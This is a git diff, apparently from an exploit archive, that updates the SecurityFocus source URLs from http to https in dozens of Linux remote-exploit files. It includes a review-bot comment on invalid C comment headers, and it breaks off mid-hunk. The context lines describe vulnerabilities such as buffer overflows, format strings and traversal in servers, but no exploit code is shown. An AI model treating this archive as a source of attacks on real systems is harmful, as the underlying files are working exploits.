--- a/exploits/linux/remote/21037.c +++ b/exploits/linux/remote/21037.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3103/info +// source: https://www.securityfocus.com/bid/3103/info lpd is the print spooling daemon. It is used to support network printing on a variety of unix platforms. diff --git a/exploits/linux/remote/21049.c b/exploits/linux/remote/21049.c index b3bedb011..90a4aaaf4 100644 --- a/exploits/linux/remote/21049.c +++ b/exploits/linux/remote/21049.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3158/info +// source: https://www.securityfocus.com/bid/3158/info NCSA HTTPd is a free, open-source web server for *nix systems. diff --git a/exploits/linux/remote/21050.c b/exploits/linux/remote/21050.c index 7d5d9578a..cf627c4d3 100644 --- a/exploits/linux/remote/21050.c +++ b/exploits/linux/remote/21050.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3158/info +// source: https://www.securityfocus.com/bid/3158/info NCSA HTTPd is a free, open-source web server for *nix systems. diff --git a/exploits/linux/remote/21075.txt b/exploits/linux/remote/21075.txt index 4d50f9ac6..20abc8d9f 100644 --- a/exploits/linux/remote/21075.txt +++ b/exploits/linux/remote/21075.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3208/info +source: https://www.securityfocus.com/bid/3208/info An input validation error exists in sdb, the SuSE Support Data Base. diff --git a/exploits/linux/remote/21095.txt b/exploits/linux/remote/21095.txt index 722f8f43d..bae59a6aa 100644 --- a/exploits/linux/remote/21095.txt +++ b/exploits/linux/remote/21095.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3241/info +source: https://www.securityfocus.com/bid/3241/info 'dvips' is a utility that converts DVI documents to PostScript. It is an optional component of the TeTeX text formatting package. When installed on a system where LPRnG and TeTeX are in use, 'dvips' will be invoked by 'lpd' when a DVI document is to be printed if a printfilter exists for it. diff --git a/exploits/linux/remote/21112.php b/exploits/linux/remote/21112.php index c24934b74..bff7d9791 100644 --- a/exploits/linux/remote/21112.php +++ b/exploits/linux/remote/21112.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3335/info +source: https://www.securityfocus.com/bid/3335/info Versions of Apache webserver shipping with Red Hat Linux 7.0 (and possibly other Apache distributions) install with a default misconfiguration which could allow remote users to determine whether a give username exists on the vulnerable system. diff --git a/exploits/linux/remote/21151.txt b/exploits/linux/remote/21151.txt index ad8d11ba9..ed6350a3a 100644 --- a/exploits/linux/remote/21151.txt +++ b/exploits/linux/remote/21151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3525/info +source: https://www.securityfocus.com/bid/3525/info IMP is a powerful web-based mail interface/client developed by members of the Horde project. diff --git a/exploits/linux/remote/21152.c b/exploits/linux/remote/21152.c index 4dcdc2e91..ec0bd047b 100644 --- a/exploits/linux/remote/21152.c +++ b/exploits/linux/remote/21152.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3526/info +// source: https://www.securityfocus.com/bid/3526/info ActivePerl is an implementation of the Perl scripting language for Microsoft Windows systems developed by Activestate. ActivePerl allows for high-performance integration with IIS using a DLL called 'perlIIS.dll' to handle a '.plx' ISAPI extension. 
diff --git a/exploits/linux/remote/21192.c b/exploits/linux/remote/21192.c index 5c5741587..8d7bfe31c 100644 --- a/exploits/linux/remote/21192.c +++ b/exploits/linux/remote/21192.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3748/info +// source: https://www.securityfocus.com/bid/3748/info Stunnel is a freely available, open source cryptography wrapper. It is designed to wrap arbitrary protocols that may or may not support cryptography. It is maintained by the Stunnel project. diff --git a/exploits/linux/remote/21200.c b/exploits/linux/remote/21200.c index 49ae65467..a4c90119e 100644 --- a/exploits/linux/remote/21200.c +++ b/exploits/linux/remote/21200.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3780/info +// source: https://www.securityfocus.com/bid/3780/info Net-SNMP is a package of software tools related to the Simple Network Management Protocol. One of the tools included is snmpnetstat, which can be used to retrieve and display a variety of information about a remote SNMP host. diff --git a/exploits/linux/remote/21205.c b/exploits/linux/remote/21205.c index 4f4b37d9b..b79934461 100644 --- a/exploits/linux/remote/21205.c +++ b/exploits/linux/remote/21205.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3787/info +// source: https://www.securityfocus.com/bid/3787/info Boozt! is a free open source banner management software for Linux hosts. diff --git a/exploits/linux/remote/21210.txt b/exploits/linux/remote/21210.txt index 7981c6d39..68e7ef575 100644 --- a/exploits/linux/remote/21210.txt +++ b/exploits/linux/remote/21210.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3830/info +source: https://www.securityfocus.com/bid/3830/info X-Chat is a graphical client for IRC. It requires the GTK+ toolkit, and is available for many Linux and Unix operating systems. diff --git a/exploits/linux/remote/21242.c b/exploits/linux/remote/21242.c index ba2d54c86..d577d31a5 100644 --- a/exploits/linux/remote/21242.c 
+++ b/exploits/linux/remote/21242.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3958/info +// source: https://www.securityfocus.com/bid/3958/info A vulnerability exists within some versions of rsync. Under some circumstances, a remotely supplied signed value is used as an array index, allowing NULL bytes to be written to arbitrary memory locations. Exploitation of this vulnerability could lead to the corruption of the stack, and possibly to execution of arbitrary code as the root user. diff --git a/exploits/linux/remote/21289.c b/exploits/linux/remote/21289.c index 0826d771d..79083f276 100644 --- a/exploits/linux/remote/21289.c +++ b/exploits/linux/remote/21289.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4104/info +// source: https://www.securityfocus.com/bid/4104/info Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows. diff --git a/exploits/linux/remote/21309.c b/exploits/linux/remote/21309.c index bca33e50d..2a8cd2372 100644 --- a/exploits/linux/remote/21309.c +++ b/exploits/linux/remote/21309.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4193/info +// source: https://www.securityfocus.com/bid/4193/info xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems. diff --git a/exploits/linux/remote/21310.txt b/exploits/linux/remote/21310.txt index 0cf3758a9..4709735d1 100644 --- a/exploits/linux/remote/21310.txt +++ b/exploits/linux/remote/21310.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4196/info +source: https://www.securityfocus.com/bid/4196/info xtell is a simple network messaging program. It may be used to transmit terminal messages between users and machines. xtell is available for Linux, BSD and most other Unix based operating systems. diff --git a/exploits/linux/remote/21365.txt b/exploits/linux/remote/21365.txt index 9d25dc368..2eb628ccd 100644 --- a/exploits/linux/remote/21365.txt +++ b/exploits/linux/remote/21365.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4424/info +source: https://www.securityfocus.com/bid/4424/info PHPGroupWare is a freely available, open source groupware system written in PHP. It is distributed and maintained by the PHPGroupWare project. diff --git a/exploits/linux/remote/21402.txt b/exploits/linux/remote/21402.txt index a52bbad9a..19b14d320 100644 --- a/exploits/linux/remote/21402.txt +++ b/exploits/linux/remote/21402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4560/info +source: https://www.securityfocus.com/bid/4560/info A buffer overflow condition exists in the OpenSSH server. The condition is exploitable by attackers with valid user credentials in versions 2.9.9 and higher. Exploitation does not require valid user credentials in versions prior to 2.9.9. diff --git a/exploits/linux/remote/21422.txt b/exploits/linux/remote/21422.txt index f9af971dc..ed8a903e1 100644 --- a/exploits/linux/remote/21422.txt +++ b/exploits/linux/remote/21422.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4601/info +source: https://www.securityfocus.com/bid/4601/info thttpd is a web server product maintained by ACME Labs. thttpd has been compiled for Linux, BSD and Solaris, as well as other Unix like operating systems. diff --git a/exploits/linux/remote/21442.c b/exploits/linux/remote/21442.c index 9a5b34928..68c759116 100644 --- a/exploits/linux/remote/21442.c +++ b/exploits/linux/remote/21442.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4713/info +// source: https://www.securityfocus.com/bid/4713/info Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition. diff --git a/exploits/linux/remote/21443.c b/exploits/linux/remote/21443.c index 12f3795f6..69523b2fd 100644 --- a/exploits/linux/remote/21443.c +++ b/exploits/linux/remote/21443.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4713/info +// source: https://www.securityfocus.com/bid/4713/info Wu-imapd is vulnerable to a buffer overflow condition. This has been reported to occur when a valid user requests partial mailbox attributes. Exploitation may result in the execution of arbitrary code as the server process. An attacker may also be able to crash the server, resulting in a denial of service condition. diff --git a/exploits/linux/remote/21586.txt b/exploits/linux/remote/21586.txt index 8a71902c0..58066cd7b 100644 --- a/exploits/linux/remote/21586.txt +++ b/exploits/linux/remote/21586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5129/info +source: https://www.securityfocus.com/bid/5129/info E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems. diff --git a/exploits/linux/remote/21602.txt b/exploits/linux/remote/21602.txt index 1e8e101e6..a7f07e5bc 100644 --- a/exploits/linux/remote/21602.txt +++ b/exploits/linux/remote/21602.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5189/info +source: https://www.securityfocus.com/bid/5189/info Icecast is a freely available, open source streaming audio server. Icecast is available for the Unix, Linux, and Microsoft Windows platforms. 
diff --git a/exploits/linux/remote/21604.txt b/exploits/linux/remote/21604.txt index 845536625..dcca6ea53 100644 --- a/exploits/linux/remote/21604.txt +++ b/exploits/linux/remote/21604.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5193/info +source: https://www.securityfocus.com/bid/5193/info A vulnerability has been reported for Apache Tomcat 4.0.3 on Microsoft Windows and Linux platforms. Reportedly, it is possible for an attacker to launch a cross site scripting attack. diff --git a/exploits/linux/remote/21663.c b/exploits/linux/remote/21663.c index 563800ddf..519331a43 100644 --- a/exploits/linux/remote/21663.c +++ b/exploits/linux/remote/21663.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5351/info +// source: https://www.securityfocus.com/bid/5351/info Fake Identd is an open source Ident server designed to return the same information to all incoming requests. It is implemented by Tomi Ollila, and available for Linux and a number of other Unix based operating systems. diff --git a/exploits/linux/remote/21706.txt b/exploits/linux/remote/21706.txt index e6c8f625f..2aa1fe259 100644 --- a/exploits/linux/remote/21706.txt +++ b/exploits/linux/remote/21706.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5453/info +source: https://www.securityfocus.com/bid/5453/info A vulnerability has been reported for Interchange 4.8.5 and earlier. Reportedly, Interchange may disclose contents of files to attackers. diff --git a/exploits/linux/remote/21722.pl b/exploits/linux/remote/21722.pl index 1d3bc5619..bc7350d46 100755 --- a/exploits/linux/remote/21722.pl +++ b/exploits/linux/remote/21722.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5499/info +source: https://www.securityfocus.com/bid/5499/info A CRLF injection vulnerability has been reported for Lynx that may allow an attacker to include extra HTTP headers when viewing web pages. If Lynx is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request. diff --git a/exploits/linux/remote/21725.c b/exploits/linux/remote/21725.c index 88c3f58cf..de6c6b459 100644 --- a/exploits/linux/remote/21725.c +++ b/exploits/linux/remote/21725.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5503/info +source: https://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. diff --git a/exploits/linux/remote/21726.c b/exploits/linux/remote/21726.c index 5643112da..b3207ad90 100644 --- a/exploits/linux/remote/21726.c +++ b/exploits/linux/remote/21726.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/5503/info +source: https://www.securityfocus.com/bid/5503/info MySQL is is an open source relational database project, and is available for a number of operating systems, including Microsoft Windows. diff --git a/exploits/linux/remote/21765.pl b/exploits/linux/remote/21765.pl index 8bc72da6c..d32a273a2 100755 --- a/exploits/linux/remote/21765.pl +++ b/exploits/linux/remote/21765.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5591/info +source: https://www.securityfocus.com/bid/5591/info In cases where users of Webmin do not have root access on the underlying host, it may be possible to mount privilege escalation attacks on the underlying host. This normally occurs in configurations where multiple Webmin client systems have access to a centralized Webmin server. 
diff --git a/exploits/linux/remote/21784.c b/exploits/linux/remote/21784.c index ca0316d0b..9849d351a 100644 --- a/exploits/linux/remote/21784.c +++ b/exploits/linux/remote/21784.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5680/info +// source: https://www.securityfocus.com/bid/5680/info Netris is prone to a remotely exploitable memory corruption issue. @@ -16,7 +16,7 @@ Netris is prone to a remotely exploitable memory corruption issue. An attacker m * cc xnetris.c -o xnetris * * * * this exploits the netris buffer overflow found roughly a year * - * ago(http://www.securityfocus.com/bid/5680), and recently * + * ago(https://www.securityfocus.com/bid/5680), and recently * * brought up again, in client-side form. (same code) * * * * when the MyEventType() function is done, the contents of the * diff --git a/exploits/linux/remote/21818.c b/exploits/linux/remote/21818.c index aec2148c8..48ab60967 100644 --- a/exploits/linux/remote/21818.c +++ b/exploits/linux/remote/21818.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5774/info +// source: https://www.securityfocus.com/bid/5774/info Null httpd is a small multithreaded web server for Linux and Windows, mantained by NullLogic. diff --git a/exploits/linux/remote/21857.pl b/exploits/linux/remote/21857.pl index bf621b355..f6a1ae748 100755 --- a/exploits/linux/remote/21857.pl +++ b/exploits/linux/remote/21857.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5792/info +source: https://www.securityfocus.com/bid/5792/info Monkey HTTP server is prone to a directory-traversal bug that may allow attackers to access sensitive files. diff --git a/exploits/linux/remote/21858.txt b/exploits/linux/remote/21858.txt index 25ec30038..dbb305ca1 100644 --- a/exploits/linux/remote/21858.txt +++ b/exploits/linux/remote/21858.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5793/info +source: https://www.securityfocus.com/bid/5793/info acWEB is prone to cross-site scripting attacks. It is possible to construct a malicious link to the web server which contains arbitrary script code. When the link is visited, the script code will be executed in the web client of the user visiting the link. The code will be executed in the context of the webserver. diff --git a/exploits/linux/remote/21870.txt b/exploits/linux/remote/21870.txt index f954d8d0e..89fd08608 100644 --- a/exploits/linux/remote/21870.txt +++ b/exploits/linux/remote/21870.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5806/info +source: https://www.securityfocus.com/bid/5806/info A vulnerability has been reported for Zope 2.5.1 and earlier. Reportedly, Zope does not handle XML-RPC requests properly. Specially crafted XML-RPC requests may cause Zope to respond to a request with an error page with system specific details. diff --git a/exploits/linux/remote/21934.txt b/exploits/linux/remote/21934.txt index f95268444..d646cf98f 100644 --- a/exploits/linux/remote/21934.txt +++ b/exploits/linux/remote/21934.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5951/info +source: https://www.securityfocus.com/bid/5951/info A vulnerability has been discovered in the kpf file sharing utility. KDE is available for the Linux operating system. diff --git a/exploits/linux/remote/21936.c b/exploits/linux/remote/21936.c index 848446e16..6fa6ab7fe 100644 --- a/exploits/linux/remote/21936.c +++ b/exploits/linux/remote/21936.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5956/info +// source: https://www.securityfocus.com/bid/5956/info ATP httpd is a lightweight HTTP server. A vulnerability has been reported in ATP httpd that may result in compromise of root access to remote attackers. It is possible to overwrite the least significant byte of the saved base pointer with a NULL if a string of maximum length is transmitted to the server. This creates a potentially exploitable condition if the saved base pointer is corrupted such that it points to attacker-controlled memory. diff --git a/exploits/linux/remote/21937.c b/exploits/linux/remote/21937.c index a7f08995b..383f4e2b2 100644 --- a/exploits/linux/remote/21937.c +++ b/exploits/linux/remote/21937.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5960/info +// source: https://www.securityfocus.com/bid/5960/info A buffer overflow has been reported in ghttpd which will allow arbitrary code to be executed with the privileges of the webserver. diff --git a/exploits/linux/remote/21945.pl b/exploits/linux/remote/21945.pl index 0dcfe05ad..b5aa7fcb8 100755 --- a/exploits/linux/remote/21945.pl +++ b/exploits/linux/remote/21945.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5988/info +source: https://www.securityfocus.com/bid/5988/info PlanetWeb is a commercially available web server integrated with dynamic DNS services. It is distributed by PlanetDNS, and available for Microsoft Operating Systems. diff --git a/exploits/linux/remote/21998.c b/exploits/linux/remote/21998.c index 06e153987..b156966cb 100644 --- a/exploits/linux/remote/21998.c +++ b/exploits/linux/remote/21998.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6141/info +// source: https://www.securityfocus.com/bid/6141/info A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts. 
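Review bot: in 21998.c the new `// source:` prefix comments out line 1 only; the unchanged context that follows ("A vulnerability has been discovered in CGIEmail. ...") is still bare prose at the top of a .c file, so the header is not valid C after this change either. If the prefix is meant to produce a valid header, wrap the whole description in a block comment the way 21725.c and 21726.c do (`/*` on line 1 with `source:` inside it). If the intent is only the URL scheme update, drop the `//` so the hunk stays a pure http to https change like the .txt entries.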
diff --git a/exploits/linux/remote/22012.c b/exploits/linux/remote/22012.c index bb6f2c244..59b996dd3 100644 --- a/exploits/linux/remote/22012.c +++ b/exploits/linux/remote/22012.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6162/info +// source: https://www.securityfocus.com/bid/6162/info Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. diff --git a/exploits/linux/remote/22013.c b/exploits/linux/remote/22013.c index b4b79650e..3dd26d9bd 100644 --- a/exploits/linux/remote/22013.c +++ b/exploits/linux/remote/22013.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6162/info +// source: https://www.securityfocus.com/bid/6162/info Light httpd is prone to a remotely exploitable buffer overflow condition. This overflow can be triggered by sending the server an excessively long GET request. As Light httpd drops user privileges when running, exploitation of this issue may result in the execution of arbitrary attacker-supplied commands with the privileges of the 'nobody' user. diff --git a/exploits/linux/remote/22016.c b/exploits/linux/remote/22016.c index a78465e86..3ceab1780 100644 --- a/exploits/linux/remote/22016.c +++ b/exploits/linux/remote/22016.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6172/info +// source: https://www.securityfocus.com/bid/6172/info LibHTTPD is vulnerable to a buffer overflow condition. By passing a POST request of excessive length, it is possible to overrun a static buffer. This may result in sensitive locations in memory being overwritten by attacker-supplied values. diff --git a/exploits/linux/remote/22021.sh b/exploits/linux/remote/22021.sh index 6e8efa20a..9c2ea5df1 100755 --- a/exploits/linux/remote/22021.sh 
+++ b/exploits/linux/remote/22021.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6190/info +source: https://www.securityfocus.com/bid/6190/info Zeroo HTTP server is a freely available, open source web server. It is available for the Linux and Microsoft Windows platforms. diff --git a/exploits/linux/remote/22026.txt b/exploits/linux/remote/22026.txt index 9c3b8840b..06a97eb43 100644 --- a/exploits/linux/remote/22026.txt +++ b/exploits/linux/remote/22026.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6204/info +source: https://www.securityfocus.com/bid/6204/info A HTML injection vulnerability has been discovered in Mhonarc. diff --git a/exploits/linux/remote/22034.pl b/exploits/linux/remote/22034.pl index 12e8be611..f6b49bdc6 100755 --- a/exploits/linux/remote/22034.pl +++ b/exploits/linux/remote/22034.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6240/info +source: https://www.securityfocus.com/bid/6240/info A remotely exploitable heap corruption vulnerability has been reported for WSMP3. diff --git a/exploits/linux/remote/22035.c b/exploits/linux/remote/22035.c index ac12f49c3..fe883a501 100644 --- a/exploits/linux/remote/22035.c +++ b/exploits/linux/remote/22035.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6240/info +// source: https://www.securityfocus.com/bid/6240/info A remotely exploitable heap corruption vulnerability has been reported for WSMP3. diff --git a/exploits/linux/remote/22046.c b/exploits/linux/remote/22046.c index 5b8862bcd..36b09d6d5 100644 --- a/exploits/linux/remote/22046.c +++ b/exploits/linux/remote/22046.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6255/info +// source: https://www.securityfocus.com/bid/6255/info A heap corruption vulnerability has been discovered in Null httpd. By passing a small content length value to the server and triggering the server to make a second recv() of POST data, it is possible to overrun a buffer. 
diff --git a/exploits/linux/remote/22057.pl b/exploits/linux/remote/22057.pl index c20c48da6..77ab907a1 100755 --- a/exploits/linux/remote/22057.pl +++ b/exploits/linux/remote/22057.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6286/info +source: https://www.securityfocus.com/bid/6286/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. diff --git a/exploits/linux/remote/22058.c b/exploits/linux/remote/22058.c index 1a28d5f2b..1737d31af 100644 --- a/exploits/linux/remote/22058.c +++ b/exploits/linux/remote/22058.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6286/info +// source: https://www.securityfocus.com/bid/6286/info A buffer overflow vulnerability has been reported in Pserv. The buffer overflow condition is due to the way Pserv handles data streams from remote connections. @@ -8,7 +8,7 @@ An attacker can exploit this vulnerability by issuing a HTTP request with an ove *pServ 2.0.x beta:webserver remote buffer overflow exploit by jsk *The aim of pServ (pico Server) is to create a portable, small webserver. *i want a sec webserver. so test some webserver. -*meet http://www.securityfocus.com/bid/6286 +*meet https://www.securityfocus.com/bid/6286 *Modified and exploit it..hehe... *ths #ph4nt0m irc.0x557.org all #cheese *[root@localhost tmp]# ./jsk -h 127.0.0.1 -p 2000 -t 0 diff --git a/exploits/linux/remote/22063.c b/exploits/linux/remote/22063.c index 275882967..f9b4306ce 100644 --- a/exploits/linux/remote/22063.c +++ b/exploits/linux/remote/22063.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6308/info +// source: https://www.securityfocus.com/bid/6308/info It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root. diff --git a/exploits/linux/remote/22064.pl b/exploits/linux/remote/22064.pl index 4f78d27d7..8982e3e58 100755 --- a/exploits/linux/remote/22064.pl +++ b/exploits/linux/remote/22064.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6308/info +source: https://www.securityfocus.com/bid/6308/info It has been reported that Zeroo fails to properly sanitize web requests. By sending a malicious web request to the vulnerable server, using directory traversal sequences, it is possible for a remote attacker to access sensitive resources located outside of the web root. diff --git a/exploits/linux/remote/22072.c b/exploits/linux/remote/22072.c index 19a39d511..47e24dc1c 100644 --- a/exploits/linux/remote/22072.c +++ b/exploits/linux/remote/22072.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6326/info +// source: https://www.securityfocus.com/bid/6326/info The RaQ4 is a server appliance distributed and maintained by Sun Microsystems. diff --git a/exploits/linux/remote/22091.c b/exploits/linux/remote/22091.c index 912b5e7f6..4bbb0888e 100644 --- a/exploits/linux/remote/22091.c +++ b/exploits/linux/remote/22091.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6402/info +// source: https://www.securityfocus.com/bid/6402/info zkfingerd is prone to a format string vulnerability. This problem is due to incorrect use of the 'syslog()' function to log error messages. It is possible to corrupt memory by passing format strings through the vulnerable logging function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/remote/22101.c b/exploits/linux/remote/22101.c index b66b0cb9c..754b09ca0 100644 --- a/exploits/linux/remote/22101.c +++ b/exploits/linux/remote/22101.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6404/info +// source: https://www.securityfocus.com/bid/6404/info zkfingerd is prone to a format string vulnerability. The affected function does not perform sufficient checks when displaying user-supplied input. It is possible to corrupt memory by passing format strings through the vulnerable function. This may potentially be exploited to overwrite arbitrary locations in memory with attacker-specified values. diff --git a/exploits/linux/remote/22106.txt b/exploits/linux/remote/22106.txt index d5330b204..d6bb0c63a 100644 --- a/exploits/linux/remote/22106.txt +++ b/exploits/linux/remote/22106.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6437/info +source: https://www.securityfocus.com/bid/6437/info A vulnerability has been reported for CUPS that if exploited may result in a DoS or the execute of code on affected systems. diff --git a/exploits/linux/remote/22129.c b/exploits/linux/remote/22129.c index f6864471c..0017a8958 100644 --- a/exploits/linux/remote/22129.c +++ b/exploits/linux/remote/22129.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/6527/info +source: https://www.securityfocus.com/bid/6527/info A vulnerability has been discovered in H-Sphere Webshell. During the pre-authentication phase Webshell fails to perform sufficient bounds checking on user-supplied HTTP parameters. As a result, a malicious attacker may be able to trigger a buffer overrun. diff --git a/exploits/linux/remote/22135.c b/exploits/linux/remote/22135.c index 84ee5fe6a..77d928a2a 100644 --- a/exploits/linux/remote/22135.c +++ b/exploits/linux/remote/22135.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6553/info +// source: https://www.securityfocus.com/bid/6553/info TANne is a freely available, open source session management package. It is available for Unix and Linux operating systems. diff --git a/exploits/linux/remote/22141.c b/exploits/linux/remote/22141.c index a01d655bb..92f10bf5c 100644 --- a/exploits/linux/remote/22141.c +++ b/exploits/linux/remote/22141.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/6580/info +// source: https://www.securityfocus.com/bid/6580/info // A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. diff --git a/exploits/linux/remote/22143.txt b/exploits/linux/remote/22143.txt index ad09d035f..65011b9bc 100644 --- a/exploits/linux/remote/22143.txt +++ b/exploits/linux/remote/22143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6585/info +source: https://www.securityfocus.com/bid/6585/info WebWeaver's FTP component has a flaw which can permit a remote user to create directories outside the FTP root. 
diff --git a/exploits/linux/remote/22147.c b/exploits/linux/remote/22147.c index 1078bd3f0..ac93acea8 100644 --- a/exploits/linux/remote/22147.c +++ b/exploits/linux/remote/22147.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6593/info +// source: https://www.securityfocus.com/bid/6593/info A memory corruption vulnerability has been reported for mpg123 that may result in code execution. diff --git a/exploits/linux/remote/22187.txt b/exploits/linux/remote/22187.txt index 1f4f75135..9f69cb4e1 100644 --- a/exploits/linux/remote/22187.txt +++ b/exploits/linux/remote/22187.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6650/info +source: https://www.securityfocus.com/bid/6650/info CVS is prone to a double free vulnerability in the Directory requests. An attacker may potentially take advantage of this issue to cause heap memory to be corrupted with attacker-supplied values, which may result in execution of arbitrary code. diff --git a/exploits/linux/remote/22205.txt b/exploits/linux/remote/22205.txt index 185170da0..92e0e8fe3 100644 --- a/exploits/linux/remote/22205.txt +++ b/exploits/linux/remote/22205.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6721/info +source: https://www.securityfocus.com/bid/6721/info Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier. diff --git a/exploits/linux/remote/22264.txt b/exploits/linux/remote/22264.txt index e94757d1f..7bae3abe6 100644 --- a/exploits/linux/remote/22264.txt +++ b/exploits/linux/remote/22264.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6884/info +source: https://www.securityfocus.com/bid/6884/info A side-channel attack against implementations of SSL exists that, through analysis of the timing of certain operations, can reveal sensitive information to an active adversary. This information leaked by vulnerable implementations is reportedly sufficient for an adaptive attack that will ultimately obtain plaintext of a target block of ciphertext. diff --git a/exploits/linux/remote/22274.c b/exploits/linux/remote/22274.c index c3027fab1..dbd4bfbfa 100644 --- a/exploits/linux/remote/22274.c +++ b/exploits/linux/remote/22274.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6913/info +// source: https://www.securityfocus.com/bid/6913/info A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs becuase the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function. diff --git a/exploits/linux/remote/22275.pl b/exploits/linux/remote/22275.pl index a5aee6533..9fd6769b5 100755 --- a/exploits/linux/remote/22275.pl +++ b/exploits/linux/remote/22275.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6915/info +source: https://www.securityfocus.com/bid/6915/info A vulnerability has been discovered in the 'Miniserv.pl' script used to invoke both Webmin and Usermin. Due to insufficient sanitization of client-supplied BASE64 encoded input, it is possible to inject a Session ID into the access control list. diff --git a/exploits/linux/remote/22278.pl b/exploits/linux/remote/22278.pl index 